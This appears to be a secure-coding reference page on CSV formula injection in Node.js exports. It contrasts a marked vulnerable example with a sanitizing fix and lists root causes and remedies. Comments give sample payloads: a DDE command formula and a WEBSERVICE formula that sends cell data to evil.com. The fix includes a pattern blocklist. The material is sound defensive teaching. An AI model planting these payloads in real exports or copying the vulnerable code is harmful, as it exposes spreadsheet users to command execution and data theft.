CSV injection (formula injection) from unsanitized user input in CSV exports

Medium Risk input-validation
csv-injectionformula-injectionspreadsheetdata-exportcode-executionexcel

What it is

CSV injection, also known as Formula injection, occurs when untrusted user input is included in CSV files without proper sanitization. When these CSV files are opened in spreadsheet applications like Microsoft Excel, Google Sheets, or LibreOffice Calc, malicious formulas can execute, potentially leading to remote code execution, data exfiltration, or local file access on the user's system.

// VULNERABLE: Direct CSV generation without sanitization
const express = require('express');
const app = express();

app.get('/export/users', async (req, res) => {
    const users = await getUsersFromDatabase();
    
    let csv = 'Name,Email,Comments\n';
    
    users.forEach(user => {
        // VULNERABLE: Direct inclusion of user data
        csv += `${user.name},${user.email},${user.comments}\n`;
    });
    
    res.setHeader('Content-Type', 'text/csv');
    res.setHeader('Content-Disposition', 'attachment; filename="users.csv"');
    res.send(csv);
});

// Malicious user data examples:
// name: "=cmd|' /C calc'!A0"
// comments: "=WEBSERVICE(\"http://evil.com/steal?data=\"&A1)"
// SECURE: CSV generation with sanitization
const express = require('express');
const app = express();

function sanitizeCSVField(field) {
    if (field === null || field === undefined) {
        return '';
    }
    
    let value = String(field);
    
    // Remove control characters
    value = value.replace(/[\x00-\x1F\x7F-\x9F]/g, '');
    
    // Check for formula indicators
    const formulaPrefixes = ['=', '+', '-', '@', '\t', '\r'];
    if (formulaPrefixes.some(prefix => value.startsWith(prefix))) {
        // Neutralize by prefixing with single quote
        value = "'" + value;
    }
    
    // Check for dangerous patterns
    const dangerousPatterns = [
        /\b(cmd|powershell|dde|webservice)\b/i,
        /\|.*!/  // DDE patterns
    ];
    
    for (let pattern of dangerousPatterns) {
        if (pattern.test(value)) {
            return '[CONTENT_SANITIZED]';
        }
    }
    
    // Escape quotes
    value = value.replace(/"/g, '""');
    
    // Quote if contains comma or newline
    if (value.includes(',') || value.includes('\n')) {
        value = `"${value}"`;
    }
    
    return value;
}

app.get('/export/users', async (req, res) => {
    try {
        const users = await getUsersFromDatabase();
        
        let csv = 'Name,Email,Comments\n';
        
        users.forEach(user => {
            // SECURE: Sanitize all user data
            const safeName = sanitizeCSVField(user.name);
            const safeEmail = sanitizeCSVField(user.email);
            const safeComments = sanitizeCSVField(user.comments);
            csv += `${safeName},${safeEmail},${safeComments}\n`;
        });
        
        res.setHeader('Content-Type', 'text/csv');
        res.setHeader('Content-Disposition', 'attachment; filename="users_secure.csv"');
        res.send(csv);
        
    } catch (error) {
        console.error('Export error:', error);
        res.status(500).json({ error: 'Export failed' });
    }
});

💡 Why This Fix Works

The vulnerable code directly includes user input in CSV files without sanitization, allowing formula injection when fields start with =, +, -, or @ characters. The secure version implements a sanitizeCSVField function that removes control characters, prefixes formula characters with a single quote to force text treatment, detects dangerous patterns like DDE commands, and properly escapes quotes and special characters, preventing formula execution in spreadsheet applications.

Why it happens

Application code directly concatenates user-provided strings into CSV files without checking for or escaping formula indicator characters (=, +, -, @, tab, carriage return). When users enter names like "=1+1" or comments containing "=cmd|' /C calc'!A0", these values get written directly to CSV fields. Upon opening in Excel, Google Sheets, or LibreOffice Calc, the spreadsheet application interprets these as formulas and executes them, potentially running commands via DDE (Dynamic Data Exchange), accessing local files, or making web requests to exfiltrate data.

Root causes

Direct Inclusion of Formula Characters in CSV Exports

Application code directly concatenates user-provided strings into CSV files without checking for or escaping formula indicator characters (=, +, -, @, tab, carriage return). When users enter names like "=1+1" or comments containing "=cmd|' /C calc'!A0", these values get written directly to CSV fields. Upon opening in Excel, Google Sheets, or LibreOffice Calc, the spreadsheet application interprets these as formulas and executes them, potentially running commands via DDE (Dynamic Data Exchange), accessing local files, or making web requests to exfiltrate data.

Missing CSV Field Escaping and Sanitization

CSV generation code lacks proper escaping logic for special characters in user data. Developers fail to implement sanitization functions that prefix dangerous characters with single quotes (') to force text interpretation, or don't use established CSV libraries that handle escaping correctly. Export functionality often treats user input as trusted data, directly interpolating database values into CSV strings without considering that content like user profiles, comments, descriptions, or any free-text field could contain malicious formulas.

Dynamic Formula Construction from User Data

Applications build CSV files with calculated fields or summary rows that incorporate user-controlled values into formula strings. For example, creating cells with formulas like "=SUM(A" + userRow + ":A" + lastRow + ")" where userRow comes from user input, or constructing VLOOKUP/INDEX formulas referencing user-supplied sheet names or cell ranges. Attackers can inject formula fragments that break out of the intended formula context and execute arbitrary spreadsheet functions.

Insufficient Input Validation in Data Export Features

Data export endpoints (user lists, order reports, analytics exports, transaction histories) lack input validation specifically designed to detect and neutralize CSV injection attempts. While applications may validate data at input time for SQL injection or XSS, they don't apply formula-specific validation before export. Export features are often implemented as ancillary functionality and receive less security scrutiny than primary user-facing features, leading to overlooked CSV injection vulnerabilities.

Overlooking Formula Injection in User-Generated Content

Security teams fail to recognize that any user-controlled data appearing in CSV exports represents an injection risk. Common overlooked fields include user profile names, email addresses, comment sections, form responses, product reviews, support ticket descriptions, custom field values, and metadata fields. Developers assume these fields contain benign text and don't anticipate users crafting formula payloads, especially in contexts where the data won't be viewed by the attacker themselves (e.g., admin exports of user data).

Fixes

1

Escape or Remove Formula Indicator Characters

Implement a sanitization function that detects and neutralizes formula indicator characters (=, +, -, @, tab \t, carriage return \r) at the beginning of CSV field values. Check if value.startsWith() matches any of these characters and either remove them entirely or prepend a space or other safe character to break formula interpretation. Apply this sanitization to every user-controlled field before including it in CSV output. This prevents spreadsheet applications from treating the content as executable formulas while preserving the original data value.

2

Prefix Dangerous Content with Single Quote

When a CSV field starts with formula characters, prefix it with a single quote (') character. Spreadsheet applications like Excel and Google Sheets treat single-quote-prefixed content as literal text, not formulas. For example, transform "=1+1" to "'=1+1". Implement this as: if (formulaPrefixes.some(prefix => value.startsWith(prefix))) { value = "'" + value; }. This is the most common industry-standard approach to CSV injection prevention and maintains readability for users who need to view the original values.

3

Use Security-Aware CSV Libraries

Adopt well-maintained CSV generation libraries that include built-in formula injection protection. For JavaScript/Node.js, use libraries like csv-stringify with proper configuration, fast-csv, or papaparse with sanitization enabled. For Python, use the csv module's proper escaping or pandas with appropriate quoting settings. For Java, use Apache Commons CSV or OpenCSV with formula detection. Configure these libraries to enable maximum security options like QUOTE_ALL mode and verify they handle formula prefixes correctly. Avoid manual string concatenation for CSV generation.

4

Remove Control Characters from CSV Fields

Strip all control characters (ASCII 0x00-0x1F and 0x7F-0x9F) from user input before CSV export using value.replace(/[\x00-\x1F\x7F-\x9F]/g, ''). Control characters can be used in advanced injection techniques and may cause parsing issues in different spreadsheet applications. Additionally, detect and block dangerous patterns like DDE command syntax (e.g., /\|.*!/ patterns), WEBSERVICE function calls, or references to external URLs. Replace detected patterns with safe placeholder text like "[CONTENT_SANITIZED]" to prevent execution while maintaining data integrity awareness.

5

Implement Pre-Export Content Validation

Add validation logic before CSV generation that scans all export data for potential formula injection payloads. Create an allowlist of acceptable patterns for each field type (e.g., email addresses match email regex, phone numbers are numeric). Implement blocklists for known dangerous patterns including cmd, powershell, DDE function calls, WEBSERVICE, HYPERLINK, and external file references. Log all blocked content for security monitoring. Consider providing users with warnings when exporting data contains potentially malicious formulas, and offer options to sanitize automatically or abort the export.

Detect This Vulnerability in Your Code

Sourcery automatically identifies csv injection (formula injection) from unsanitized user input in csv exports and many other security issues in your codebase.